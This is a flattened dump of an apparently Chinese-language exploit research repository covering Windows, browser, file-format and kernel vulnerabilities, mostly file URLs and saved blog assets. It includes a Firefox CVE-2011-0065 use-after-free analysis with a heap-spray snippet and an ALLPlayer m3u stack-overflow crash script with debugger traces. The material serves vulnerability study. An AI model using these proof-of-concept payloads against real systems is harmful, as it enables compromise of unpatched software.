├── Article ├── 0sc-p │ ├── Images │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ ├── 4.png │ │ └── 5.png │ └── poc.py ├── File │ └── 缓冲区溢出.zip ├── Rop 实战之利用 VirtualProtect绕过DEP.docx └── windowsh环境下shllcode编写.docx ├── Browser Vulnerability ├── CVE-2011-0065 │ ├── 1.png │ ├── Firefox_Setup_3.6.16.exe │ ├── OllyFindAddr.dll │ ├── analysis.md │ ├── exp.html │ ├── exploit.HTML │ └── poc.html └── Exploit-Win-8.1-Pre-IE-11-64-bit │ ├── Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview.html │ ├── Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files │ ├── 202786884-widgets.js.下载 │ ├── 2437439463-css_bundle_v2.css │ ├── 25936583-postmessagerelay.js.下载 │ ├── 368954415-lightbox_bundle.css │ ├── 3802865867-lbx.js.下载 │ ├── analytics.js.下载 │ ├── array.png │ ├── authorization.css │ ├── cb=gapi(1).loaded_0 │ ├── cb=gapi(2).loaded_1 │ ├── cb=gapi(3).loaded_0 │ ├── cb=gapi.loaded_0 │ ├── cb=gapi.loaded_1 │ ├── cb=gapi.loaded_2 │ ├── cb=gapi.loaded_3 │ ├── fastbutton.html │ ├── ghost-rider-lego.jpg │ ├── lazy.min.js.下载 │ ├── mem.png │ ├── my_photo.jpg │ ├── navbar.html │ ├── photo(1).jpg │ ├── photo.jpg │ ├── platform_gapi.iframes.style.common.js.下载 │ ├── plusone.js.下载 │ ├── postmessageRelay.html │ ├── rpc_shindig_random.js.下载 │ ├── rs=AGLTcCNs5888EhQ53gL5wA6TSup-ZHQ8wg │ ├── screenshot.png │ ├── spbsg.jpg │ ├── string.png │ ├── translateelement.css │ └── zFdxGE77vvD2w5xHy6jkVuElKv-U9_9qLkRYK8OnbDeJPtjSZ82UPq5w6hJ-SA=s35 │ ├── analysis.md │ ├── exp.html │ └── poc.html ├── Bypass └── COOP-Oakland15.pdf ├── File Format Vulnerability ├── ALLPlayerEN_6.7_stackoverflow │ ├── ALLPlayer.exe │ ├── ALLPlayerEN_6.7.0.exe │ ├── ALLPlayerEN_6.7_栈溢出分析.docx │ ├── ALLPlayerEN_6.7_栈溢出分析.md │ ├── ALLPlayer_Poc.m3u │ ├── analysis.txt │ ├── calc.m3u │ ├── exp.py │ ├── exp1.py │ ├── ntdll.dll │ ├── ntdll.idb │ ├── player.m3u │ ├── poc.py │ └── rekt.m3u ├── CVE-2010-3333 │ ├── 1.png │ ├── MSO.DLL │ ├── analysis.md │ ├── moonagirl.rtf │ ├── msf.rtf │ └── unMSO.DLL ├── CVE-2012-0158 │ └── exp.rtf ├── CVE-2013-7409 │ └── poc.py ├── CVE-2017-11882 │ ├── DATA │ ├── File │ │ ├── carsh1.docx │ │ ├── carsh2.docx │ │ ├── carsh3.docx │ │ └── exploit-calc.docx │ ├── Images │ │ ├── EQNOLEFILEHDR.png │ │ ├── Equation-Native.png │ │ ├── FONT-record.png │ │ ├── IPersistStorage-Load.png │ │ ├── IPersistStorage-interface.png │ │ ├── IPersistStorage.png │ │ ├── MTEF-Byte-Stream.png │ │ ├── MTEF-header.png │ │ ├── ReadMTEFData.png │ │ ├── Tag-byte-structure.png │ │ ├── Test-rtf-Equation-Native.png │ │ ├── Test-rtf.png │ │ ├── exploit-rtf-Equation-Native.png │ │ ├── functions.png │ │ ├── interface.png │ │ ├── oleinit.png │ │ ├── ret.png │ │ └── stackoverflow.png │ ├── OleFileView.zip │ ├── eqnedt322007-kb4011604-fullfile-x86-ar-sa.exe │ ├── eqnedt322007-kb4011604-fullfile-x86-ar-sa.idb │ ├── exploit.md │ ├── knowledge.md │ ├── patch.md │ └── skills.md └── CVE-2018-4878 │ ├── CVE-2018-4878-master.zip │ ├── CVE-2018-4878.rar │ ├── Poc │ ├── CVE-2018-4878漏洞分析.docx │ ├── Poc.as3proj │ ├── bin │ │ ├── Poc.swf │ │ ├── expressInstall.swf │ │ ├── index.html │ │ └── js │ │ │ └── swfobject.js │ ├── obj │ │ ├── PocConfig.old │ │ └── PocConfig.xml │ └── src │ │ └── Poc │ │ ├── Main.as │ │ └── MyListener.as │ ├── analysis.md │ ├── cve-2018-4878.py │ └── malware-samples-36a4c97289c32de81d6ba0565f00571dceac92f6.zip ├── Fuzzer ├── AFL初探.md ├── AFl文件变异.md ├── afl1.png ├── eu-16-Jurczyk-Effective-File-Format-Fuzzing-Thoughts-Techniques-And-Results.pdf ├── fuzz Adobe Reader.md ├── post_fuzzing-reader-wtf.png └── the_art_of_fuzzing_slides.pdf ├── History ├── CFG原理及绕过技巧.md ├── CFI │ └── CFI.md ├── Images │ ├── after.png │ ├── aslr.png │ ├── before.png │ ├── bypass.png │ ├── cfg.png │ ├── dep-kernel.png │ ├── dep.png │ ├── dkohm.png │ ├── exec.png │ ├── gs1.0.png │ ├── gs1.1.png │ ├── gs2.0.png │ ├── guard.png │ ├── heap.png │ ├── heap1.png │ ├── kernel-stack.png │ ├── lfh.png │ ├── listentry.png │ ├── mm.png │ ├── pre.png │ ├── rand.png │ ├── safe.png │ ├── safeseh1.png │ ├── sealed.png │ ├── sehop.png │ ├── sehop1.png │ ├── shellcode.png │ ├── unlink.png │ ├── vtg.png │ ├── win1.png │ ├── win2.png │ ├── win3.png │ ├── win7.png │ └── win8.png ├── PAC │ ├── pac.md │ ├── slides_23.pdf │ └── whitepaper-pointer-authentication-on-armv8-3.pdf ├── RFG原理.md ├── Windows漏洞防护与利用发展史-内核层.md ├── Windows漏洞防护与利用发展史-应用层.md ├── afl.md └── trendmicro.md ├── README.md └── Windows Kernel Vulnerability ├── CVE-2014-1767 ├── 1 │ ├── CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园.html │ └── CVE-2014-1767 漏洞分析(2015.1) - 會飛的貓 - 博客园_files │ │ ├── 24442-20171206093644566-325426505.png │ │ ├── 24442-20171208101900738-116140477.jpg │ │ ├── 928323-20160501120056941-521000199.png │ │ ├── 928323-20160501120057535-1926957792.png │ │ ├── 928323-20160501120058175-1651279641.png │ │ ├── 928323-20160501120058644-274645935.png │ │ ├── 928323-20160501120059128-479937764.png │ │ ├── 928323-20160501120059785-318854944.png │ │ ├── 928323-20160501120100347-1097263581.png │ │ ├── 928323-20160501120100738-1402769642.png │ │ ├── 928323-20160501120101300-47970014.png │ │ ├── 928323-20160501120102066-439387585.png │ │ ├── 928323-20160501120102503-260248986.png │ │ ├── 928323-20160501120102894-799784821.png │ │ ├── 928323-20160501120103425-20637235.png │ │ ├── 928323-20160501120103894-2146368649.png │ │ ├── 928323-20160501120104410-1243386177.png │ │ ├── 928323-20160501120104863-2088752860.png │ │ ├── 928323-20160501120105285-1813557857.png │ │ ├── 928323-20160501120105707-991419323.png │ │ ├── 928323-20160501120106019-1901645584.png │ │ ├── 928323-20160501120106769-1978294529.png │ │ ├── 928323-20160501120107425-1893723380.png │ │ ├── 928323-20160501120108128-1338026729.png │ │ ├── 928323-20160501120108738-2074080055.png │ │ ├── 928323-20160501120109222-836873254.png │ │ ├── 928323-20160501120109894-475395427.png │ │ ├── 928323-20160501120110363-835793604.png │ │ ├── 928323-20160501120110863-489063356.png │ │ ├── 928323-20160501120111488-32302803.png │ │ ├── InsertCode.gif │ │ ├── analytics.js.下载 │ │ ├── b.png │ │ ├── base.js.下载 │ │ ├── blog-common.css │ │ ├── blog-common.js.下载 │ │ ├── bundle-LessIsMore-mobile.css │ │ ├── bundle-LessIsMore.css │ │ ├── get │ │ ├── icon_weibo_24.png │ │ ├── img.gif │ │ ├── indent.png │ │ ├── jquery-2.2.0.min.js.下载 │ │ ├── lk.png │ │ ├── mention.js.下载 │ │ ├── quote.gif │ │ ├── sample_face.gif │ │ └── wechat.png ├── 2 │ ├── CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园.html │ └── CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files │ │ ├── 24442-20171206093644566-325426505.png │ │ ├── 24442-20171208101900738-116140477.jpg │ │ ├── 928323-20160501123856410-1417966897.png │ │ ├── 928323-20160501123856816-1716396550.png │ │ ├── 928323-20160501123857238-1357395101.png │ │ ├── InsertCode.gif │ │ ├── analytics.js.下载 │ │ ├── b.png │ │ ├── base.js.下载 │ │ ├── blog-common.css │ │ ├── blog-common.js.下载 │ │ ├── bundle-LessIsMore-mobile.css │ │ ├── bundle-LessIsMore.css │ │ ├── copycode.gif │ │ ├── encoder.js.下载 │ │ ├── get │ │ ├── icon_weibo_24.png │ │ ├── img.gif │ │ ├── indent.png │ │ ├── jquery-2.2.0.min.js.下载 │ │ ├── lk.png │ │ ├── mention.js.下载 │ │ ├── quote.gif │ │ ├── sample_face.gif │ │ └── wechat.png ├── 3 │ ├── CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu.html │ └── CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu_files │ │ ├── 10.jpg │ │ ├── 4.jpg │ │ ├── 5.jpg │ │ ├── 8.jpg │ │ ├── 9.jpg │ │ ├── WpPineapple.js(1).下载 │ │ ├── WpPineapple.js.下载 │ │ ├── bootstrap.min.css │ │ ├── bootstrap.min.js.下载 │ │ ├── codebox.css │ │ ├── codebox.js.下载 │ │ ├── ga.js.下载 │ │ ├── jquery.js(1).下载 │ │ ├── jquery.js.下载 │ │ ├── jquery.notice.css │ │ ├── jquery.notice.js.下载 │ │ └── style.css ├── Cve-2014-1767.rar ├── Pwn2Own_2014_AFD.sys_privilege_escalation.pdf ├── afd.$$$ ├── afd.id0 ├── afd.id1 ├── afd.id2 ├── afd.nam ├── afd.sys ├── afd.til ├── afd_1767_Exp.zip ├── afd_1767_win32_Exp.cpp ├── analysis.md └── cve-2014-1767_Afd.sys_double-free分析与利用.pdf └── CVE-2017-0047 ├── analysis.md ├── exp.c ├── know.md ├── poc.zip └── win32k.sys /Article/0sc-p/Images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/1.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/2.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/3.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/4.png -------------------------------------------------------------------------------- /Article/0sc-p/Images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/0sc-p/Images/5.png -------------------------------------------------------------------------------- /Article/File/缓冲区溢出.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/File/缓冲区溢出.zip -------------------------------------------------------------------------------- /Article/Rop 实战之利用 VirtualProtect绕过DEP.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/Rop 实战之利用 VirtualProtect绕过DEP.docx -------------------------------------------------------------------------------- /Article/windowsh环境下shllcode编写.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Article/windowsh环境下shllcode编写.docx -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/CVE-2011-0065/1.png -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/Firefox_Setup_3.6.16.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/CVE-2011-0065/Firefox_Setup_3.6.16.exe -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/OllyFindAddr.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/CVE-2011-0065/OllyFindAddr.dll -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | 3 | 在nsObjectLoadingCoChannelRedirect函数中,当mChannel对象未被分配时,会临时赋予一个新对象值,而该新对象值在函数返回后会被回收释放, 4 | 导致mChannel成为悬挂指针, 5 | 6 | 程序又在后面的nsObjectLoadingContent::LoadObject函数中引用了悬挂指针mChannel,调用mChannel对象的函数,最终导致UAF漏洞的发生。 7 | 8 | ## 漏洞利用 9 | 10 | 为了实现任意代码执行,需要在mChannel对象释放后,用可控数据“占坑”填充它,因此,可在onChannelRedirect函数调用完成后,紧跟着申请一块大小相同的内存: 11 | 12 | e = document.getElementById("d"); 13 | 14 | e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0) 15 | 16 | fake_obj_addr = unescape("\x1C%u0c0c") 17 | 18 | 执行后,虚表指针就会被0x0c0c001c填充,从而控制程序的执行流程 19 | 20 | 之后再结合堆喷技+VirtualProtect执行shellcode实现利用 21 | 22 | ![](./1.png) 23 | 24 | ## -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/exp.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 32 | -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/exploit.HTML: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 32 | -------------------------------------------------------------------------------- /Browser Vulnerability/CVE-2011-0065/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 12 | 13 | -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/25936583-postmessagerelay.js.下载: -------------------------------------------------------------------------------- 1 | var h=this,q=function(a,c){a=a.split(".");var b=h;a[0]in b||"undefined"==typeof b.execScript||b.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===c?b=b[d]&&b[d]!==Object.prototype[d]?b[d]:b[d]={}:b[d]=c},r=function(a,c){function b(){}b.prototype=c.prototype;a.o=c.prototype;a.prototype=new b;a.prototype.constructor=a;a.m=function(a,b,f){for(var e=Array(arguments.length-2),d=2;db;b+=4)c[b/4]=a[b]<<24|a[b+1]<<16|a[b+2]<<8|a[b+3];for(b=16;80>b;b++)a=c[b-3]^c[b-8]^c[b-14]^c[b-16],c[b]=(a<<1|a>>>31)&4294967295;a=e[0];var d=e[1],f=e[2],l=e[3],g=e[4];for(b=0;80>b;b++){if(40>b)if(20>b){var k=l^d&(f^l);var n=1518500249}else k=d^f^l,n=1859775393;else 60>b?(k=d&f|l&(d|f),n=2400959708):(k=d^f^l,n=3395469782);k=((a<<5|a>>>27)&4294967295)+ 4 | k+g+n+c[b]&4294967295;g=l;l=f;f=(d<<30|d>>>2)&4294967295;d=a;a=k}e[0]=e[0]+a&4294967295;e[1]=e[1]+d&4294967295;e[2]=e[2]+f&4294967295;e[3]=e[3]+l&4294967295;e[4]=e[4]+g&4294967295}function b(a,b){if("string"===typeof a){a=unescape(encodeURIComponent(a));for(var e=[],d=0,l=a.length;dg?b(n,56-g):b(n,64-(g-56));for(var p=63;56<=p;p--)f[p]=d&255,d>>>=8;c(f);for(p=d=0;5>p;p++)for(var m=24;0<=m;m-=8)a[d++]=e[p]>>m&255;return a}for(var e=[],f=[],m=[],n=[128],B=1;64>B;++B)n[B]=0;var g,k;a();return{reset:a,update:b,digest:d,digestString:function(){for(var a=d(),b="",c=0;ca.length)return null;c=a[0];b=gadgets.rpc.getOrigin(a[1]);if(b!==a[1])return null;a=a.slice(2);return(a=(b&&c?["session_state",aa(G(b),c,a||[])].join(" "):null)||"")&&a.substr(14)||null},K=function(a,c,b){this.i=String(a||"");this.f=String(c||"");this.a=String(b||"");this.b={};this.j=this.l=this.g=this.h="";this.c=null}; 6 | K.prototype.evaluate=function(){var a={},c="";try{c=String(document.cookie||"")}catch(m){}c=c.split("; ").join(";").split(";");for(var b=0,d=c.length;b 2 | 3 | 21 | 22 | 23 | 24 |
25 |
26 | 28 | 31 | 37 |
27 |
29 |
30 |
32 | 33 | 34 | 更多 35 | 36 | 下一个博客»		 38 | 创建博客 39 | 登录
40 | 49 | -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo(1).jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo(1).jpg -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/photo.jpg -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/postmessageRelay.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/screenshot.png -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/spbsg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/spbsg.jpg -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/string.png -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/zFdxGE77vvD2w5xHy6jkVuElKv-U9_9qLkRYK8OnbDeJPtjSZ82UPq5w6hJ-SA=s35: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/Ivan Fratric's Security Blog_ Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview_files/zFdxGE77vvD2w5xHy6jkVuElKv-U9_9qLkRYK8OnbDeJPtjSZ82UPq5w6hJ-SA=s35 -------------------------------------------------------------------------------- /Browser Vulnerability/Exploit-Win-8.1-Pre-IE-11-64-bit/poc.html: -------------------------------------------------------------------------------- 1 | 11 | 12 |
aaaaaaaaaa aaaaaaaaaa
13 |
aaaaaaaaaa aaaaaaaaaa
14 |
aaaaaaaaaa aaaaaaaaaa
15 |
aaaaaaaaaa aaaaaaaaaa
16 |
aaaaaaaaaa aaaaaaaaaa
17 |
aaaaaaaaaa aaaaaaaaaa
-------------------------------------------------------------------------------- /Bypass/COOP-Oakland15.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Bypass/COOP-Oakland15.pdf -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayer.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayer.exe -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7.0.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7.0.exe -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7_栈溢出分析.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7_栈溢出分析.docx -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayerEN_6.7_栈溢出分析.md: -------------------------------------------------------------------------------- 1 | ## 1 结合poc定位漏洞 2 | 从github上找到了poc 3 | 4 | junk = "http://" 5 | buffer="\x41" * 5000 6 | exploit = junk + buffer 7 | try: 8 | out_file = open("ALLPlayer_Poc.m3u",'w') 9 | out_file.write(exploit) 10 | out_file.close() 11 | print "Exploit file created!" 12 | except: 13 | print "Error" 14 | 15 | 用ALLPlayer打开poc生成的ALLPlayer_Poc.m3u,程序崩溃 16 | 17 | This exception may be expected and handled. 18 | eax=00120041 ebx=066bb35c ecx=00130000 edx=066bc8d4 esi=00001390 edi=00000000 19 | eip=7c932f4e esp=0012ea2c ebp=0012ea2c iopl=0 nv up ei pl nz na pe nc 20 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 21 | ntdll!wcscpy+0xe: 22 | 7c932f4e 668901 mov word ptr [ecx],axds:0023:00130000=6341 23 | 24 | wcscpy函数把从src地址开始且含有'\0000'结束符的字符串复制到以dest开始的地址空间,返回值的类型为wchar_t* #Unicode) 25 | 26 | ntdll!wcscpy: 27 | 7c932f40 8bffmov edi,edi 28 | 7c932f42 55 pushebp 29 | 7c932f43 8becmov ebp,esp 30 | 7c932f45 8b4d08 mov ecx,dword ptr [ebp+8] #char *strDestination 31 | 7c932f48 8b550c mov edx,dword ptr [ebp+0Ch] #char *strSource 32 | 7c932f4b 668b02 mov ax,word ptr [edx] 33 | 7c932f4e 668901 mov word ptr [ecx],axds:0023:00130000=6341 34 | 35 | wcscpy函数 36 | 37 | __int16 *__cdecl wcscpy(__int16 *a1, __int16 *a2)# {# __int16 *des; // ecx 38 | __int16 *sou; // edx 39 | __int16 index; // ax 40 | des = a1; 41 | sou = a2; 42 | do 43 | { 44 | index = *sou; 45 | *des = *sou; 46 | ++des; 47 | ++sou; 48 | } 49 | while ( index ); 50 | return a1; 51 | } 52 | 拆看ebp内容 53 | 54 | 0:000> dd ebp 55 | 0012ea2c 0012ea60 7c80bb10 0012ea88 066bb35c 56 | 查看源字符串内容 57 | 58 | 0:000> dd 0012ea88 59 | 0012ea88 00740068 00700074 002f003a 0041002f 60 | 0012ea98 00410041 00410041 00410041 00410041 61 | 0012eaa8 00410041 00410041 00410041 00410041 62 | 0012eab8 00410041 00410041 00410041 00410041 63 | 0012eac8 00410041 00410041 00410041 00410041 64 | 0012ead8 00410041 00410041 00410041 00410041 65 | 0012eae8 00410041 00410041 00410041 00410041 66 | 0012eaf8 00410041 00410041 00410041 00410041 67 | 68 | 目标字符串内容 69 | 70 | 0:000> dd 066bb35c 71 | 066bb35c 00740068 00700074 002f003a 0041002f 72 | 066bb36c 00410041 00410041 00410041 00410041 73 | 066bb37c 00410041 00410041 00410041 00410041 74 | 066bb38c 00410041 00410041 00410041 00410041 75 | 066bb39c 00410041 00410041 00410041 00410041 76 | 066bb3ac 00410041 00410041 00410041 00410041 77 | 066bb3bc 00410041 00410041 00410041 00410041 78 | 066bb3cc 00410041 00410041 00410041 00410041 79 | 80 | 查看函数调用 81 | 82 | 0:000> kv 83 | ChildEBP RetAddr Args to Child 84 | 0012ea2c 7c80bb10 0012ea88 066cb35c 00000000 ntdll!wcscpy+0xe (FPO: [Non-Fpo]) 85 | 0012ea60 00699632 0012ea88 066cb35c 0012ecf0 kernel32!lstrcpyW+0x1c (FPO: [Non-Fpo]) 86 | WARNING: Stack unwind information not available. Following frames may be wrong. 87 | 0012ecdc 00410041 00410041 00410041 00410041 ALLPlayer!TMethodImplementationIntercept+0x22cb3e 88 | 0012ece0 00410041 00410041 00410041 00410041 ALLPlayer+0x10041 89 | 90 | 可以看到ALLPlayer!TMethodImplementationIntercept+0x22cb3e是ntdll!wcscpy的调用者 91 | 92 | 93 | 在ida中找到ALLPlayer!TMethodImplementationIntercept+0x22cb3e处 94 | 95 | .text:0069960A loc_69960A: ; CODE XREF: .text:006995FC↑j 96 | .text:0069960A pushebx 97 | .text:0069960B calllstrlenW_0_0 98 | .text:00699610 mov esi, eax 99 | .text:00699612 inc esi 100 | .text:00699613 lea eax, [ebp-254h] 101 | .text:00699619 xor ecx, ecx 102 | .text:0069961B mov edx, 104h 103 | .text:00699620 callsub_407B64 104 | .text:00699625 pushebx <-------------- 源字符串 105 | .text:00699626 lea eax, [ebp-254h] 106 | .text:0069962C pusheax <---------------目标缓冲区 107 | .text:0069962D calllstrcpyW <-------------- 崩溃触发点 108 | .text:00699632 mov eax, [ebp+8] 109 | 110 | 在该函数中下断再重新打开ALLPlayer_Poc.m3u,断下 111 | 112 | 0:005> bp ALLPlayer!TMethodImplementationIntercept+0x22cb1e 113 | 0:005> g 114 | Breakpoint 1 hit 115 | eax=0000138f ebx=066bb35c ecx=7c809ac6 edx=0000000a esi=0000138f edi=00000000 116 | eip=00699612 esp=0012ea70 ebp=0012ecdc iopl=0 nv up ei ng nz na pe nc 117 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 118 | ALLPlayer!TMethodImplementationIntercept+0x22cb1e: 119 | 00699612 46 inc esi 120 | 121 | 查看关键位置 122 | 123 | 0:000> dd eax 124 | 0012ea88 00000000 00000000 00000000 00000000 125 | 0012ea98 00000000 00000000 00000000 00000000 126 | 0012eaa8 00000000 00000000 00000000 00000000 127 | 0012eab8 00000000 00000000 00000000 00000000 128 | 0012eac8 00000000 00000000 00000000 00000000 129 | 0012ead8 00000000 00000000 00000000 00000000 130 | 0012eae8 00000000 00000000 00000000 00000000 131 | 0012eaf8 00000000 00000000 00000000 00000000 132 | 0:000> dd ebx 133 | 066bb35c 00740068 00700074 002f003a 0041002f 134 | 066bb36c 00410041 00410041 00410041 00410041 135 | 066bb37c 00410041 00410041 00410041 00410041 136 | 066bb38c 00410041 00410041 00410041 00410041 137 | 066bb39c 00410041 00410041 00410041 00410041 138 | 066bb3ac 00410041 00410041 00410041 00410041 139 | 066bb3bc 00410041 00410041 00410041 00410041 140 | 066bb3cc 00410041 00410041 00410041 00410041 141 | 0:000> dd esp 142 | 0012ea6c 066bb35c 0012ecf0 00699791 0012ecdc 143 | 0012ea7c 00b55bf8 066bb35c 00000000 00000000 144 | 0012ea8c 00000000 00000000 00000000 00000000 145 | 0012ea9c 00000000 00000000 00000000 00000000 146 | 0012eaac 00000000 00000000 00000000 00000000 147 | 0012eabc 00000000 00000000 00000000 00000000 148 | 0012eacc 00000000 00000000 00000000 00000000 149 | 0012eadc 00000000 00000000 00000000 00000000 150 | 151 | 至此我们知道这是一个栈溢出,当ebx中的字符串足够长时,会覆盖函数返回地址以及栈中的一些重要数据 152 | 153 | ## 2 漏洞利用 154 | 障碍:实验环境winxp sp3 开启了DEP,GS等保护 155 | 156 | 思路: 157 | 158 | - 1)通过构造ROP构造出可以执行的内存块 159 | - 2)利用SEH 160 | 161 